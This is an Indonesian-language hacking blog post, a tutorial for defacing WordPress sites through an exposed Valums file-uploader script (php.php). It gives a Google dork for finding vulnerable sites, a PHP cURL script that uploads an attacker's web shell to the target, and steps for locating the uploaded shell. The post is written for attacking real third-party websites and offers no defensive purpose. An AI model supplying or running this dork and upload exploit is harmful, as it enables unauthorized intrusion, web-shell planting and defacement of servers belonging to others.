Assalamualaikum Wr.Wb
Kembali lagi bersama beta , sekarang beta mau berikan tutorial yg mungkin bermanfaat bagi kalian :D
Sekarang saya akan memberikan "Tutorial Deface Dengan Wordpress Valums Uploader"
tutorial ini hampir sama dengan tutor valums uploader , cuman klau yg ini pake wordpress
Oke klau gitu langsung aja. Cekidot!!!!
Dork : "index of /" "fileuploader.css" "php.php"
exploit : php.php
Csrf Xampp :
<?php
$uploadfile="shellmu.php";
$ch = curl_init("targetmu");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Klau ada yg blum bisa gunakan csrf xampp ini belajar dulu lah di google.com -_-
pertama cari target dengan menggunakan dork diatas .
klau dapat contoh kyak gini
site.com/wp-content/themes/blablalbalb/upload/php.php
klau mau tau vulnya nih liat gambar di bwah
ok sisa upload doang dengan CSRF Xamppnya :v
klau berhasil , nanti di csrf xamppnya ada tulisan "true" mungkin kyak gitu :v
klau mau nyari path uploadnya cari sendiri karena biasa beda beda :v
Ok gitu aja .
Terima kasih klau ada salah mohon di betulkan di komentar :D
Waasalamualaikum Wr.Wb
Thanks To : Mr.3RR0R - PhantomGhost - Sulawesi IT Sec
Facebook : https://www.facebook.com/marselERROR
Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/